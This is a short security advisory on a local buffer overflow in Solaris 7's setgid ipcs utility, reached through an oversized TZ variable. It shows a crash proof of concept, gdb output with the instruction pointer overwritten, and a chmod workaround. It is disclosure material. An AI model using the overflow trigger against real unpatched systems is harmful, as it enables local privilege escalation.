Vulnerability

    ipcs

Affected

    Solaris 7 x86 (Other Solaris versions are most likely affected also)

Description

    Marc  Maiffret  found  following.   He  has  discovered  a  buffer
    overflow in  the /usr/bin/i86/ipcs  utility provided  with Solaris
    7.   The  problem  exists  in  the  parsing  of  the TZ (TIMEZONE)
    environment  variable.   By   exploiting  this  vulnerability   an
    attacker can  achieve local  sys group  privileges.   IPCS is used
    for gathering  information on  active inter-process  communication
    facilities.   Exploitation  of  this  vulnerability  would be very
    difficult, but not impossible.

        bash-2.03$ TZ=`perl -e 'print "A"x1035'`
        bash-2.03$ /usr/bin/i86/ipcs
        IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
        Message Queue facility inactive.
        T ID KEY MODE OWNER GROUP
        Shared Memory:
        m 0 0x500004d3 --rw-r--r-- root root
        Semaphore facility inactive.
        Segmentation Fault (core dumped)

    Note: [buffer] is any 1036 (or so) character string. A's...

        bash-2.03$ su root
        Password:
        # gdb /usr/bin/i86/ipcs core
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        <snip>
        #0 0x41414141 in ?? ()
        (gdb) info reg eip
        eip 0x41414141 0x41414141
        (gdb)

Solution

    Sun Microsystems has been  contacted.  They are  currently working
    on patches  for this  and other  related vulnerabilities  eEye has
    discovered.

    Workaround:

        chmod -s /usr/bin/i86/ipcs

    This will remove the setgid bit from /usr/bin/i86/ipcs,  therefore
    if someone does exploit this vulnerability, they won't gain higher
    privileges.